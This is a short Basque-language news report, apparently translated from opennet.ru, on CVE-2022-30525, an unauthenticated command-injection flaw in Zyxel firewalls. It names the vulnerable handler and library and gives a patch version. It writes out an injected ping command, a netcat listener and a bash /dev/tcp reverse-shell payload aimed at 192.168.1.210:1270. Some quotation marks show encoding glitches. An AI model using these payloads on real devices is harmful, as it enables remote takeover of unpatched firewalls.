Kodea autentifikaziorik gabe exekutatzeko aukera ematen duen Zyxel suebakietan ahultasuna

Ahultasun kritiko bat (CVE-2022-30525) identifikatu da ATP, VPN eta USG FLEX serieko Zyxel gailuetan, enpresetan suebakien, IDS eta VPNen funtzionamendua antolatzeko diseinatua, kanpoko erasotzaile bati kodea exekutatzeko aukera ematen diona. gailua erabiltzaile eskubiderik gabe autentifikaziorik gabe. Eraso bat egiteko, erasotzaileak HTTP/HTTPS protokoloa erabiliz gailura eskaerak bidaltzeko gai izan behar du. Zyxel-ek ahultasuna konpondu du ZLD 5.30 firmwarearen eguneratzean. Shodan zerbitzuaren arabera, gaur egun 16213 gailu daude sare globalean HTTP/HTTPS bidez eskaerak onartzen dituztenak.

Eragiketa /ztp/cgi-bin/handler web-kudeatzaileari bereziki diseinatutako komandoak bidaliz egiten da, autentifikaziorik gabe eskuragarria. Arazoa lib_wan_settings.py liburutegian erabilitako eta setWanPortSt eragiketa prozesatzen denean exekutatzen den os.system deia erabiliz sisteman komandoak exekutatzean eskaera-parametroen garbiketa egokia ez izateak eragiten du.

Adibidez, erasotzaile batek katea pasa lezake β€œ; ping 192.168.1.210;" horrek sisteman β€œping 192.168.1.210” komandoa exekutatuko du. Komando shell-era sarbidea lortzeko, "nc -lvnp 1270" exekutatu dezakezu zure sisteman, eta, ondoren, alderantzizko konexio bat abiarazi gailura eskaera bat bidaliz '; bash -c \Β»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\Β»;’.

Iturria: opennet.ru

Gehitu iruzkin berria